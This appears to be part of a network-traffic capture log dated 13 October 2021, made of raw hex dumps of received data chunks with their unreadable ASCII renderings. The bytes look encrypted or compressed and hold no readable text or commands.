                                        2021-10-13 14:33:05 UTC80INData Raw: 6e ee 78 f2 ec b5 05 58 ca f8 13 b6 dc 1c 3a 48 0b 9f 6d 1a 34 3d 59 13 7f 33 0f 13 e9 8f 94 56 09 85 73 65 1f 51 33 d3 0e 39 69 8c bc 64 87 08 45 e7 2b e8 43 09 c4 e4 16 0a f8 39 33 26 20 2c 2e e4 0d a9 e2 a9 ca a8 6c 09 30 72 25 e3 eb 25 b3 18 05 46 74 30 17 3a 4d 86 09 72 5a 68 c6 86 55 af 82 81 10 4c b8 f8 df e0 3d f5 7b e8 0e 70 c9 d1 17 36 27 8d d9 a2 aa 38 dc 81 60 98 bc 0c 67 f4 ec 15 9f d9 95 ac 77 65 97 24 38 00 5d f8 62 07 3d 54 3a f4 07 c5 3c 54 e6 fa bd 53 92 99 91 fe e6 db 1f d9 05 db 71 91 02 3d 54 c0 21 3c a7 a1 71 93 2f 57 1c 91 8f 01 9e 0e b3 af bc 84 ff 71 83 64 53 d7 d9 43 0e 61 8c 00 2e 3f 0f 37 d1 2a 86 c0 b1 ff 30 aa e5 2e 3d d7 6c 8e 98 3e 59 2a 1c 24 c9 63 08 c3 f0 2d 7e 95 ac c0 af 74 7a 41 30 cd c8 41 78 c6 ec 18 15 51 e6 e8 d4
                                        Data Ascii: nxX:Hm4=Y3VseQ39idE+C93& ,.l0r%%Ft0:MrZhUL={p6'8`gwe$8]b=T:<TSq=T!<q/WqdSCa.?7*0.=l>Y*$c-~tzA0AxQ
                                        2021-10-13 14:33:05 UTC81INData Raw: 14 9b 39 48 ca 2f 81 6f 80 fa dd 62 3c 37 05 94 a9 99 90 f3 8d 34 fc fb cd e9 e0 a6 d0 28 ac 25 dd 64 f3 cc da 4e 65 ef 86 ec fc 68 34 62 7a 83 b4 f4 8c 27 e2 21 3c 2c 7f f5 1a ec 02 2d cb b0 ab 44 9d c1 4a 93 13 05 45 7e 97 b6 5d f3 56 06 74 34 dc 26 d3 13 6f 25 43 a4 d7 bf 4b 67 4f 38 65 e8 93 aa 3b 96 72 37 38 da df 1c 25 06 4e 9f 60 75 0b ea a7 62 83 6f b9 19 c4 4a 05 96 f9 ce 17 87 66 42 24 db c7 33 e4 50 46 04 1f aa 16 44 64 f6 f6 07 e2 37 33 7c 30 98 ed d8 05 7b d0 ce d5 bd 10 1c 98 6c 72 cc 3d 10 3c 32 e5 b6 ea 80 14 93 c5 6e f6 3c e1 3c a0 36 83 81 e6 03 eb 61 1e 7e 29 a6 bd bf 1c 19 25 6b de ec 4d 82 94 14 b3 ff 0d 52 b3 9c 31 a8 73 5e e4 51 4d e1 e2 a2 84 6c 59 3f 93 9e 62 ea 91 54 66 f4 a7 4f d3 5a 49 01 9d fa 17 b2 02 8c 0c 51 18 d3 52 06 4f
                                        Data Ascii: 9H/ob<74(%dNeh4bz'!<,-DJE~]Vt4&o%CKgO8e;r78%N`uboJfB$3PFDd73|0{lr=<2n<<6a~)%kMR1s^QMlY?bTfOZIQRO
                                        2021-10-13 14:33:05 UTC82INData Raw: dd 3a ac 9b 41 4d 72 21 2e 4d e4 06 9b 7d b5 5d aa f9 15 8f 56 ac b6 2b bd 00 97 ae 2f e8 4d f6 ad a9 3d 70 b2 23 5d ea 57 3a df 0a 82 5f 8f e4 85 9f 91 fc 6c d4 b8 a3 28 ed 4c 73 2c df 08 ae eb 94 bd 56 ec a3 01 75 f8 6d 9b 61 ab 7f 28 fb 9b 3c 3a 12 2d 1a 50 5c 59 a3 9e ef 48 52 1b f7 4b 28 b5 e3 a4 97 ad e2 d1 c9 76 2e 90 81 1e b5 0e 16 ad 43 25 91 ea c7 7a 88 bf 6b 6e 76 25 1d 02 fe 56 94 8c cc ca bd 69 5a 42 3c 55 3a 58 c3 2e 88 85 54 ec 59 34 f5 39 64 1e 14 cd 15 5b d9 22 91 2b 80 fa d7 4d 77 3b 6a aa a0 86 93 c8 3b 30 ed f6 c4 cf 30 a7 fc 32 ab 11 fe d7 df 72 d8 21 49 82 4a ea e3 6d 20 78 76 fd 8b e9 87 d3 cb b2 27 3d 7e e5 23 ca 98 05 77 a2 98 49 bc 5e 8e 97 15 15 02 dd 96 b6 51 9b 63 08 1b 06 c1 2a ca 30 ae 30 48 b4 3f 96 49 64 58 21 78 db 89 a8
                                        Data Ascii: :AMr!.M}]V+/M=p#]W:_l(Ls,Vuma(<:-P\YHRK(v.C%zknv%ViZB<U:X.TY49d["+Mw;j;002r!IJm xv'=~#wI^Qc*00H?IdX!x
                                        2021-10-13 14:33:05 UTC83INData Raw: a4 e5 04 16 ea 34 a3 85 72 3e 8d 9c 4d d4 68 37 61 cb 0b e5 89 98 e1 39 38 13 68 26 90 4a 83 bf 3f 90 14 b7 f3 1b fc f0 fe d5 1a ed 0c 02 7a db 93 29 10 33 c7 3c 29 07 b7 8d 89 f6 7b 34 4c 33 21 81 60 b0 58 be f8 a5 0f e6 f1 ef 5b 70 22 ba 08 52 5c 2e 42 3c 51 58 a5 58 6c 6b 2f 3a 9e f5 24 df 62 c1 31 16 63 e8 df 50 07 c1 50 7c d9 e3 82 09 d9 0d 75 5b 47 76 48 4c 13 b5 0d 84 f7 8e cd 64 9c 85 83 dd d6 85 97 a0 00 6c 26 be 23 c1 a1 1d c3 3b 3f 2d 82 6b 87 67 00 2c 32 bd 7e f8 f3 bd 7b 3a 10 58 19 e0 7c 41 1f f6 68 5c 08 e6 59 01 f9 05 ca 96 eb 84 8f 30 87 5b 51 f7 13 a2 8a 3d e4 8f 03 16 8a ef e9 7c 90 47 76 6f 5f c3 36 9b 4b 02 98 c4 b1 43 00 8c ca 61 4e f8 67 e0 63 b7 01 5c e3 5d 02 bf c2 7e 3d 7b 3e ae d9 0d b8 02 c5 15 61 3c 38 9b 74 89 81 60 4d 7a 76
                                        Data Ascii: 4r>Mh7a98h&J?z)3<){4L3!`X[p"R\.B<QXXlk/:$b1cPP|u[GvHLdl&#;?-kg,2~{:X|Ah\Y0[Q=|Gvo_6KCaNgc\]~={>a<8t`Mzv
                                        2021-10-13 14:33:05 UTC84INData Raw: 64 c3 ee c3 bb d7 57 92 6d bb 72 0c e3 05 3e c6 20 f3 e0 80 e0 35 1e a3 33 09 c2 55 0a 08 52 53 08 bc 2e e1 23 96 c5 e5 12 47 9d df ff ad e8 76 76 47 ef 35 4b 50 87 72 1e 00 60 e3 77 ff d5 42 6c f1 32 fa 4f 6a c6 7f 14 10 45 db 05 8a 99 a8 7d 54 57 39 ae 4e bf c1 b1 ac 09 0b a7 0b ac 97 9a 84 bf 13 50 b1 5d ce ea 17 6b e1 b3 ac 5f 85 57 0c b3 b2 c4 6c d0 d7 3f 37 c9 b8 64 28 fd 19 a7 fb bc 4f 59 c4 8d 1c 50 ed 68 46 df a6 60 04 06 89 17 0a ac 56 d3 5a 57 4c ac 9c fa 88 ce 20 e6 5a 45 54 ab a6 9d b4 f2 81 11 67 3f 85 97 02 6a 0d 16 ad 41 2b e5 c7 ce 52 b4 95 2b 66 19 e3 35 43 f6 47 8e 92 0c 4f 1a 17 59 52 2e 6d 9b f9 7f 2e 8c 90 74 e9 51 5b d3 34 7b 54 fd 16 2a 41 f2 70 a0 c4 80 e5 96 59 69 37 14 91 bb 78 98 cc b0 36 ee 83 ec e5 1e ad e5 52 ce 1d f7 de fd
                                        Data Ascii: dWmr> 53URS.#GvvG5KPr`wBl2OjE}TW9NP]k_Wl?7d(OYPhF`VZWL ZETg?jA+R+f5CGOYR.m.tQ[4{T*ApYi7x6R
                                        2021-10-13 14:33:05 UTC86INData Raw: cb 33 76 fa ed 1f 19 25 59 b1 68 4c 91 a2 96 a0 00 12 14 a0 3f 31 b9 6d 57 db 84 0f cd e2 80 27 90 8a c4 9a 87 6a e8 91 4c 71 15 bf 9d d7 72 4e 41 82 e0 9b 84 15 72 0c 55 29 ca 5f 0c 55 49 9e 5e 9b e8 1c 0a e5 22 86 85 72 3e a8 88 1c 06 65 37 6c a0 cb e6 a5 9f fb 51 30 ea 6a 26 9e ec 73 8c 36 83 0f f7 73 01 02 f1 cd f1 0a e1 12 c5 79 cf b4 fb 16 1d 8d f8 2a 74 8d 01 3e eb bf 6f 9f 1a 09 9a 67 98 11 aa 06 ae 32 e0 fe 3a 28 3d 3c 44 03 56 1e 07 47 0e 07 e6 58 a7 61 64 96 b5 98 fd 13 05 7e d2 f4 33 63 f9 d0 5c 26 39 51 fd e1 e1 84 36 9f 0d 64 4c 45 77 76 1f 55 b5 0d 85 ce 2c d5 9a 97 81 ba d8 c1 59 7e 27 3d 6c 3f ac 02 f2 b1 14 d2 ed 64 01 87 77 e2 fa 12 25 34 20 48 e4 0d bd 44 10 1e 4e 1c 63 43 50 10 e8 40 8a 32 c8 53 1a ec 16 03 8c 63 a4 b0 23 89 4d 68 c4
                                        Data Ascii: 3v%YhL?1mW'jLqrNArU)_UI^"r>e7lQ0j&s6sy*t>og2:(=<DVGXad~3c\&9Q6dLEwvU,Y~'=l?dw%4 HDNcCP@2Sc#Mh
                                        2021-10-13 14:33:05 UTC87INData Raw: 76 f8 cb 35 00 d6 8a e1 15 62 a4 0f 33 fb 65 6a 91 64 c4 61 10 cf e1 c2 3c 25 7d fc a2 ce b2 7e 80 fc 9d 81 19 c6 2d c7 d2 9c 1b 2f 39 9b 52 a0 a1 bc 5c fc 8d 53 03 b4 b6 e0 ed 31 b1 33 b0 b3 8f 6c ca f2 7d 89 ea 55 98 7f fc b6 0f e3 09 44 ef b4 80 d5 fc a2 3d 36 e9 19 4a ca 5c 18 12 c1 6c 0a bd 28 df 6e 96 be 24 1b 5e 0f 80 85 ad 93 b7 5e 07 e9 bb f6 75 c4 72 65 c1 69 f9 e5 3c 3b 51 6d f0 3a fc 52 6a c6 7f 85 99 da eb 05 9b 97 bf 75 99 57 15 85 6f f4 c8 b8 b7 17 4b 35 2d c6 4d f4 8f f5 11 50 bb 29 ed ea 57 2b b4 e9 ac 5f 8b c5 80 ae 9b ff 39 d0 c6 3a 3f 3b cb 4f 04 f1 0a d3 2a 82 8e 59 d2 85 2b 2f fe 67 4c dd b8 6c 2e c0 19 3e 49 ae 2f 19 29 69 4a a4 87 e0 34 32 34 e4 5a 4d 54 a3 a6 9d b4 e1 fc cf bf 4c c5 93 71 5e 27 56 a5 50 24 be b9 ce 52 b4 a5 04 e0
                                        Data Ascii: v5b3ejda<%}~-/9R\S13l}UD=6J\l(n$^^urei<;Qm:RjuWoK5-MP)W+_9:?;O*Y+/gLl.>I/)iJ424ZMTLq^'VP$R
                                        2021-10-13 14:33:05 UTC88INData Raw: 02 e2 54 6b 15 d1 d6 41 69 6e 68 0b 17 fc f7 46 64 f8 f6 6f 7d 37 33 76 39 fa 2a d8 0d 68 27 de ff 69 87 3a 98 64 66 49 ec 3c 3e 21 f8 bb ca d1 e8 92 e3 6e a6 f8 ca f1 8c a6 f0 bf ee 04 fb 77 98 ba 0c 7e d2 a6 35 59 2d 41 d4 fd 49 e2 e0 13 b3 00 25 12 b1 30 3b 80 23 4a e9 70 1f e4 fa b5 f5 44 75 3b 87 cf b4 e7 91 59 c9 65 b5 62 d6 54 ff 68 2b f7 17 bb 17 09 c6 7d 1a cf 56 17 40 97 0e 6e 88 e7 1e 60 3a 3d ba 7f 62 1f a1 cd 66 ce 6f 35 13 15 f5 e4 a1 92 91 05 41 d5 62 37 9c b7 0b 8c 36 83 31 f7 f8 01 08 e0 d6 bf 5d ec 12 de 5e 90 ba 05 1d 19 fd f8 29 0d a2 06 2f ec 2e 2c ec 25 09 e1 a0 b0 51 ac b1 cb 30 e5 e6 e8 f9 52 6a 46 72 b5 5e 05 43 0d 3e a1 8c 28 41 7c f9 33 e2 2d 15 0f 65 ce ea 3e 64 9b e1 41 37 cd 41 d9 ab dc 80 ba d3 25 24 4f 54 75 61 97 60 f1 0f
                                        Data Ascii: TkAinhFdo}73v9*h'i:dfI<>!nw~5Y-AI%0;#JpDu;YebTh+}V@n`:=bfo5Ab761]^)/.,%Q0RjFr^C>(A|3-e>dA7A%$OTua`
                                        2021-10-13 14:33:05 UTC89INData Raw: 20 34 ec f1 a9 e2 a3 f4 a8 62 2d b5 1d 91 28 f0 04 aa 1b 14 47 6b 12 36 a5 47 97 03 f8 74 b9 e1 a6 b6 0d 93 8b 98 5e b3 f4 63 ab a1 f9 72 41 2e 36 55 d6 1e 38 c9 81 45 ae 99 1d d7 05 62 9a c7 5c 61 eb c0 41 90 d9 95 ad fa 67 9f db 95 eb 5d f8 63 b3 71 49 10 de a5 e4 3c 54 61 81 6e 78 b2 7a 93 85 2a 47 19 c2 38 c0 50 1c 00 b8 51 43 54 a0 ab 1c 4e 8b a4 87 10 ba be 8e 8f 06 8d 7e 44 64 30 6c c8 83 9c c8 e8 51 95 e8 b8 32 0e e1 74 e2 d1 b6 84 c8 e8 3a 3d 4d 24 31 09 cc 32 ca 24 4e ea 0b bc 22 e3 63 94 c5 fc 2b 5c 0b 86 c0 af e8 7a 5e 07 fc 23 4a 53 dd 70 19 1d 97 f8 cd 4a a2 5a 6d f6 2e 79 98 46 c4 6c 00 2e 51 cc fb 9a ba b5 76 a8 7d f6 8d 3c 65 c8 b8 b9 8e 2a 92 07 c6 5e c6 a4 bf 66 50 b1 5d c6 ea 57 21 df 29 87 04 8f e9 89 52 92 fb 79 d4 c4 4b e3 ed 46 61
                                        Data Ascii: 4b-(Gk6Gt^crA.6U8Eb\aAg]cqI<Tanxz*G8PQCTN~Dd0lQ2t:=M$12$N"c+\z^#JSpJZm.yFl.Qv}<e*^fP]W!)RyKFa
                                        2021-10-13 14:33:05 UTC91INData Raw: b2 b8 4b 95 77 4f 93 15 9e 46 11 96 b7 48 91 52 05 75 32 c3 a7 eb 18 6f 35 5b b5 38 b5 4f db 5a 2b 68 fe 94 b2 37 96 9f 27 19 f8 f4 18 1d 22 a3 74 8d 68 09 7c a6 71 b5 79 b0 41 cf 62 d4 39 f9 c8 10 87 79 7d 07 cf de 2c 3a 51 6b 0b 1d c7 a3 56 77 da 76 2e 70 30 20 7f 48 a3 e3 d8 0b 7f 26 de f1 ae 04 7f b0 66 64 34 2a 2f 3b 33 f8 bb 6c 2e fd 48 fa 79 ce 30 e1 e5 99 ac 92 8f 7d 12 df 74 81 cc 24 aa c1 a9 0c 17 38 97 cd e2 5c 9f b5 04 82 ec 1c 5f c7 b1 31 a8 63 59 ec 6d d4 f6 3d 35 51 6d 75 3a ad fe 7b e7 9b 29 6c 0a a6 78 c5 53 4c 58 ac b0 16 bb 1f 63 00 12 0f ca 5f 0c 29 65 83 44 8e f1 0f 1e fe 2e bc 6d 62 15 07 3d 70 14 76 21 7b dc de cd b4 92 f3 34 d2 c3 46 01 85 c2 25 89 27 86 88 a8 f5 60 2a 1b d3 cc 13 c6 c6 d5 76 da 90 21 17 31 b6 e9 2f 16 bc 14 e8 f2
                                        Data Ascii: KwOFHRu2o5[8OZ+h7'"th|qyAb9y},:QkVwv.p0 H&fd4*/;3l.Hy0}t$8\_1cYm=5Qmu:{)lxSLXc_)eD.mb=pv!{4F%'`*v!1/
                                        2021-10-13 14:33:05 UTC92INData Raw: 46 ef 71 f2 1d e8 67 69 0d 99 67 76 13 b6 dd 93 39 54 17 ae d8 0b 31 b3 72 07 63 3c 38 03 75 89 8d 5f 2d 7a 77 73 e1 ce 3e cb 39 31 0e c3 be 7b 9d 06 4e f7 56 f7 5e 17 ad 63 11 15 ec 55 70 b8 26 39 4b d5 e5 83 e2 a9 56 bd 43 2c 2f b2 b8 e5 f4 c4 ac 0c 88 56 78 18 0f 1a 4c 86 09 ee 4d 7d fa b2 4e ae ae 93 9d 4f b1 d5 c8 ba a4 7d d3 e5 24 37 55 dd 17 05 2b 8a 45 b5 bf 08 02 41 4c 9b a4 83 6b eb d5 3f 0b 27 94 80 ed 75 9b 0b 03 ed 57 f8 73 91 24 58 ee d5 fd c3 17 02 65 e8 b1 72 b2 6f 9b e1 f4 b9 18 ea 21 d5 53 20 bd 3d 6a cc 5e a0 b0 b4 41 71 b2 7d 0a 86 6e 8a 9e 0e ac 3a a9 91 cf 7f c0 e7 58 36 e9 79 94 71 9f 2d 00 f0 05 37 c0 bc 9f c8 7c e1 13 39 f2 39 18 c1 d2 a5 a1 a7 6c 0a bc 3b d1 70 9e c5 fe 11 41 1d 52 c1 83 e2 6d 56 10 3b 26 49 67 d1 63 14 0a 78 f3
                                        Data Ascii: Fqgigv9T1rc<8u_-zws>91{NV^cUp&9KVC,/VxLM}NO}$7U+EALk?'uWs$Xero!S =j^Aq}n:X6yq-7|99l;pARmV;&Igcx
                                        2021-10-13 14:33:05 UTC93INData Raw: 62 07 05 06 00 4a b1 f7 a9 c4 84 f8 ac 96 66 37 01 88 38 fd 46 e0 86 30 82 6e d3 e7 18 a5 87 e4 bd 22 f1 c8 6d b7 3c 21 4f e9 e9 82 e1 67 2d b7 32 b7 97 dc 87 d9 e9 1e 2b 3e 69 fb 23 8b 98 05 7b 9c 7e 46 b5 70 66 3c 14 13 6b 37 80 a5 5c b4 4a 04 74 38 1d 09 e5 30 58 34 48 b8 3a b7 64 44 59 2b 6e 68 aa 74 20 84 8a 1e bb d9 f4 1f 3b 34 a3 67 b7 44 21 ea ad af b3 7b be 69 42 4b 05 3d ef cc 7d 4d 6a 69 11 55 78 3c c0 46 b0 18 12 c7 bb 7c ab f2 e0 2f 72 4d ef 76 3b 85 f0 d3 97 7f 23 cd 82 63 08 10 9c 75 6f 25 ea a6 2d 29 eb cd 3f 99 ea 96 c5 22 cc 38 db fd 9c 89 55 85 ec 02 e7 eb 97 c9 33 7d c6 b8 09 31 8c 41 de e6 65 0d a4 11 b9 1b 01 46 9b 8e 33 a8 64 5e 64 7d 0e e1 ea ac 6e 79 5d 98 85 b4 73 cf cb 5d 7e 00 b7 6e a2 6c 5d 50 86 f5 6c 62 15 72 09 55 6f cb 5f
                                        Data Ascii: bJf78F0n"m<!Og-2+>i#{~Fpf<k7\Jt80X4H:dDY+nht ;4gD!{iBK=}MjiUx<F|/rMv;#cuo%-)?"8U3}1AeF3d^d}ny]s]~nl]PlbrUo_
                                        2021-10-13 14:33:05 UTC95INData Raw: 7b 15 34 3c c3 43 e6 0d b6 41 07 0d 33 e0 6c 43 4b 70 9d 7c 74 39 f7 54 1a e5 29 69 9d 67 bd 94 5f ed 4f 79 c1 3d 94 86 04 d7 e2 37 1e a2 54 f8 70 8d bd 39 7a 4d ca 3c e5 28 1a 66 cf 91 5f 0f a7 3e ee 71 fe 08 8d 72 b3 10 69 fb 56 15 a7 d2 ef 08 55 13 b5 b2 76 36 3d cf 33 4b 0c 01 67 5d f8 8b 4c 2f 46 6e 74 14 e5 1b cf 15 20 49 7c b8 7b 91 31 5b 70 2b e6 50 79 b1 7a 10 1f 89 4a 24 ba 2c 15 20 ca f7 7f f1 a7 47 a0 62 30 11 5f 46 1a 0b 0c 81 3c 88 4b 43 c9 33 b6 4b e9 65 ec 5c 7d c3 b7 bb be 88 95 a4 f6 a5 dc c6 bd 2c f4 64 cd 10 22 41 c3 20 b3 38 80 4f 8c a4 1f fc 4a 0f f5 be 90 6b cd d5 3e 39 fd 96 ac ed 0c e4 0f 18 f4 7b f6 67 8a 30 24 c2 d4 d1 cf 6d 5a 7e ba 8e 71 b6 5e 2a ff e6 47 4d ed 2d c0 49 5d 50 2a 51 50 55 a0 ab 92 0d 9e b7 46 99 ad bf 89 8f 1e
                                        Data Ascii: {4<CA3lCKp|t9T)ig_Oy=7Tp9zM<(f_>qriVUv6=3Kg]L/Fnt I|{1[p+PyzJ$, Gb0_F<KC3Ke\},d"A 8OJk>9{g0$mZ~q^*GM-I]P*QPUF
                                        2021-10-13 14:33:05 UTC96INData Raw: 48 a0 8e d6 d1 40 0b ec 76 4c 54 cd a6 9d b8 83 dc d5 67 35 fb 95 67 66 07 12 87 af d1 96 f8 fd 59 96 93 69 64 1f 9a 4a 03 f4 4d fe 99 19 a4 72 78 4a 57 2c 63 9b cb 7f 2e 8c a5 59 fa 4d 6b c1 3b 21 14 03 17 06 48 ca 2e ab c7 84 d2 65 4b 66 31 00 b6 2d 87 99 ea aa 3f c5 de d0 e7 18 d4 da 3a bd 28 8f d0 f3 e4 53 20 4f e7 aa e1 cb 49 25 69 7c e1 99 e9 87 d3 99 0f 34 40 99 f3 0b e0 9a 00 73 b0 83 3a b5 76 48 ee f7 13 6d 15 bc b6 5b 9c 61 34 70 32 09 2a c0 18 6f 34 48 b2 2b 96 70 64 58 21 6c fe ff 4d 24 84 88 34 02 a5 19 19 1d 26 b2 63 e2 99 21 ea a3 73 b7 17 5f 50 c4 4e 07 1d f9 8e 07 91 e7 42 15 db ce 56 fd 51 6a 0f 1f a7 c3 46 64 f8 9d cc 70 36 37 74 40 62 e1 d8 09 6e 41 80 f8 bf 02 12 eb 17 66 32 36 41 da 25 e9 b2 e0 e2 0e 92 e9 68 df 51 85 f0 88 ab 81 fa
                                        Data Ascii: H@vLTg5gfYidJMrxJW,c.YMk;!H.eKf1-?:(S OI%i|4@s:vHm[a4p2*o4H+pdX!lM$4&c!s_PNBVQjFdp67t@bnAf26A%hQ
                                        2021-10-13 14:33:05 UTC97INData Raw: 40 59 6a 50 f3 37 9e 80 fe 0f 61 db fc 2f 66 e8 ce 46 29 39 51 fd cf e4 a7 44 de bb 65 4d 52 0c 0c 91 13 bf 7e f9 e4 87 df 97 82 a0 9a dc c1 42 6c b2 fc 6d 13 a6 29 c3 c3 a0 d9 c5 38 0a 9d 6e 88 7b 02 20 29 52 76 c8 07 bb 51 6b ea 5c 0f 68 5f 52 1a f7 6f 71 24 1a 58 27 eb 19 c6 9a 67 aa 8a 2d 78 4c 55 c2 19 cd fb 17 d9 87 1d 0f a7 5e f8 79 8c 95 57 5e 4f dd 25 8f 42 09 63 da 97 b0 05 a3 12 c6 74 c0 48 1e 8f 4c 30 51 e8 46 23 b4 dc bb 3c 57 13 72 dd 1a 25 29 ce 01 6a 29 16 1e e2 89 8b 4d 3a 6f 61 61 37 83 34 cc 1f 37 22 1a 96 7c 9d 63 dd 7b 2d f6 74 15 ad 06 12 15 ec 30 bc b1 f8 3d 14 ec d7 a9 e2 a3 5b 86 4b 29 2f 03 67 e5 f3 2e ac 0d 89 40 6b 12 37 96 4d 8d 22 ee 52 e2 e5 a6 b1 45 80 a9 9b 4a a7 d6 c2 bd dc f9 65 cd 15 34 43 aa 03 11 38 84 47 d7 ca 1d fc
                                        Data Ascii: @YjP7a/fF)9QDeMR~Blm)8n{ )RvQk\h_Roq$X'g-xLU^yW^O%BctHL0QF#<Wr%)j)M:oaa747"|c{-t0=[K)/g.@k7M"REJe4C8G
                                        2021-10-13 14:33:05 UTC98INData Raw: 7b 6e c8 1f 75 d5 ae 60 17 2e 41 da f2 41 91 ac 0b 4d 0b 21 5f b4 4e a2 a8 62 42 94 75 0f e1 ef a3 76 6d 7d 24 8c 4a 78 cb 9b 5a 7a 77 b5 62 d6 5a 42 5a 88 f7 1f a3 eb 73 21 75 69 70 5e 06 40 4a 98 48 88 ef 05 e5 eb 11 b0 78 5b 9d 88 8a 6d e2 71 2d 64 d3 fd ff 5b 94 ce 3f 68 7d 74 2a 94 cc 28 70 37 a5 10 b0 f9 7c 0d f0 d2 c8 04 e2 12 dc 60 2e b9 29 15 26 b0 fa 21 18 b9 fd 3f cd a3 2e e9 1d 56 65 92 4f 56 82 15 94 20 e4 47 e2 5b 79 ef 44 09 6f 48 16 43 3c bd a7 5a a7 6b 6d fd 29 67 fc 39 08 62 c8 d4 05 7a fb db 43 26 c3 49 2f d9 cf 87 ad d3 17 77 49 54 6e 74 89 ed b4 21 81 cd ab ce 89 99 a9 98 dd dc ad 68 87 0e 64 3c bb 02 02 b1 14 de c8 20 12 83 7d 9c 7f 08 db 33 80 72 fd 07 a0 44 12 01 4d 0b 70 bd 40 33 fb 7c 6d 35 97 00 0b e8 0b d9 82 74 bf 8f 21 82 5a
                                        Data Ascii: {nu`.AAM!_NbBuvm}$JxZzwbZBZs!uip^@JHx[mq-d[?h}t*(p7|`.)&!?.VeOV G[yDoHC<Zkm)g9bzC&I/wITnt!hd< }3rDMp@3|m5t!Z
                                        2021-10-13 14:33:05 UTC99INData Raw: d3 43 60 eb c2 2a 01 ca 90 ac fa 66 97 00 e6 ff 71 f1 6a 8a 3f 7a 08 cb df d6 39 54 6b f9 b5 86 b3 52 92 e6 f5 42 19 d7 2c db 5f f3 05 0e 69 dd 2f ae a0 be 5b e0 35 53 03 b4 a2 95 94 1d b6 33 ab 9e d0 7d 34 f9 79 c7 ea 2e 81 66 93 36 34 6e 0f 37 d1 a9 94 cc 87 e0 2e 33 fd cf 08 e4 5a 39 2f 3e 65 19 b9 24 d8 66 8b d3 11 1a 72 00 ae d4 d2 e6 7d 5e 03 f2 22 52 7d c6 61 1b 15 67 07 e0 64 b5 53 16 e1 39 87 9d 53 3e 85 f4 d1 49 db 16 9e 96 a6 58 b7 a8 14 a3 53 b8 ca c3 b1 01 9d bc 68 4c 4f f6 ad a8 c9 43 b5 51 d0 f9 52 30 d8 27 b5 a1 8e c2 83 ae e8 d9 62 d0 c2 5f ae ef 46 6f bc fb 12 bd e4 82 9f 58 d2 73 02 59 fd 70 55 cb a9 6e 2d e7 9f c5 48 82 2f 31 5f 6f a1 59 72 01 74 52 3b e3 5a 42 7e e3 a4 45 be f0 eb d5 1c 2f 80 91 75 79 04 3e 66 54 2e 90 8b 4f 50 be b7
                                        Data Ascii: C`*fqj?z9TkRB,_i/[5S3}4y.f64n7.3Z9/>e$fr}^"R}agdS9S>IXShLOCQR0'b_FoXsYpUn-H/1_oYrtR;ZB~E/uy>fT.OP
                                        2021-10-13 14:33:05 UTC100INData Raw: e8 bd 8a 91 6a 63 19 d9 cc 23 75 9a 6b 0b 1b f8 bc 40 6c 9d 95 2f 70 3c 62 61 30 5f f0 dc 19 3d 38 c4 27 b5 00 3c 9e 6c 0b 65 3c 3c 34 f9 ee 9c e2 98 fa 92 e9 6e dd 38 ca ec ab a1 89 81 ec 04 f1 7d a0 cc 33 7b d3 ac 1d c5 2f 41 cf ee 1d ea aa 10 b3 0e 78 6e b3 30 30 85 69 60 c7 78 0e e7 98 3b 78 6d 7f 41 87 e4 16 2e 90 5d 78 00 8e f0 d4 5e 57 5d ac 64 15 bb 1f 7e 04 03 89 cb 5f 0c 6e 81 80 44 8e f4 18 1d 85 a9 b8 7b 79 01 8f a1 5a dc 63 1f fd d1 f5 ee b6 90 e1 2a 46 ba fe 24 94 ce 19 a4 34 d9 08 b2 f2 6e c8 f0 d2 ca 35 f0 03 d0 67 d5 c3 1c 16 31 b8 f2 38 02 c8 19 3f e1 a5 14 e9 5e 2f 9b 6d b4 3e 6c 07 a4 25 c2 f4 e4 73 ee 3c 44 03 53 e4 db 49 16 29 59 4c 80 6b 7c e2 5e ce fd 15 05 bd dd b7 53 ab e9 df 45 26 c3 3f 19 d9 e3 84 b8 89 76 69 4c 54 7b 58 aa 13
                                        Data Ascii: jc#uk@l/p<ba0_=8'<le<<4n8}3{/Axn00i`x;xmA.]x^W]d~_nD{yZc*F$4n5g18?^/m>l%s<DSI)YLk|^SE&?viLT{X
                                        2021-10-13 14:33:05 UTC102INData Raw: a1 d8 32 1d cd 9e bc e3 a9 52 a2 6f 3a 29 09 a8 e3 eb 14 52 0d b5 62 69 69 39 b7 4d 82 0b ed 27 56 e4 a6 b4 c0 57 80 8c 4c 8f 46 c2 ab ab e5 7e a2 b8 36 55 dd 17 01 2b 86 45 b5 b3 00 e4 be 61 b4 ab 92 1a e5 c5 35 15 cf bd 35 e9 63 82 1b 00 91 f4 f8 62 91 24 52 03 d2 d1 d4 3a 4b 73 02 a3 54 fa 7c ea f0 e7 47 1d d8 a4 ef 56 0d 05 31 7c ce 51 b6 be ee c3 9e b6 46 1c f5 33 9b 9b 16 a4 af ab 9e d6 76 56 e9 50 d2 f7 42 0e 76 96 29 11 e8 93 26 d4 aa 9f cb 1e f1 3a 2b f5 ad 18 cd 4a 0c f1 88 6c 0a b6 3b c3 70 92 c5 fe 1d 41 00 52 c1 83 e3 5c 5e 0f ed 35 52 7c d9 7c 0d 0c 69 e8 e7 57 b6 af 6c dd 31 bf 73 6b c6 7b 14 23 45 d2 05 8a 90 a8 49 54 57 39 95 45 d5 c6 b9 bd 04 9a 36 b0 70 65 6f a5 bf 19 46 a9 32 67 ea 57 3a d6 37 bf 59 8f ff 95 b3 8e 29 62 fc d2 32 53 e3
                                        Data Ascii: 2Ro:)Rbii9M'VWLF~6U+Ea55cb$R:KsT|GV1|QF3vVPBv)&:+Jl;pAR\^5R||iWl1sk{#EITW9E6peoF2gW:7Y)b2S
                                        2021-10-13 14:33:05 UTC103INData Raw: 13 e1 bd b7 54 29 7f 53 85 89 1a 7b 0f f9 1f 5b 9c 78 1b 6c 21 c7 2a d1 1c 70 3e b6 b3 05 97 65 1f 56 2a 6e ec 80 da 28 85 8c 32 7b 52 f6 19 17 48 b2 1b 8e 7d 21 ee 71 59 28 68 b9 5a d2 54 6a 94 f9 ce 0c 8e 61 7a 11 db de 2f 05 5c 94 0a 31 c3 b2 3f 6a f3 e0 2b 74 1e a8 74 3b 8b f7 c6 62 c5 2e cf f3 a0 06 03 9c 64 75 36 23 2c c0 24 c5 a1 e0 e2 e4 93 e9 68 db 16 51 f3 88 ab 95 9f 83 ad f1 66 9a d6 22 6f d6 ac 0c 1d 30 53 20 ed 61 9e a6 6a b9 0b 0d 56 8a 8b 31 a8 62 57 fa 69 0a e1 fa bc 62 93 74 17 8a b6 02 e9 90 5d 7a 65 3a 61 d6 54 57 49 97 f3 17 aa 11 6d 03 83 1b e7 74 04 3d 4f 80 44 8c fd 91 30 ea 3d bb 76 7a 04 96 da fb c7 72 28 23 4f fc fc b9 09 eb 22 5e 49 61 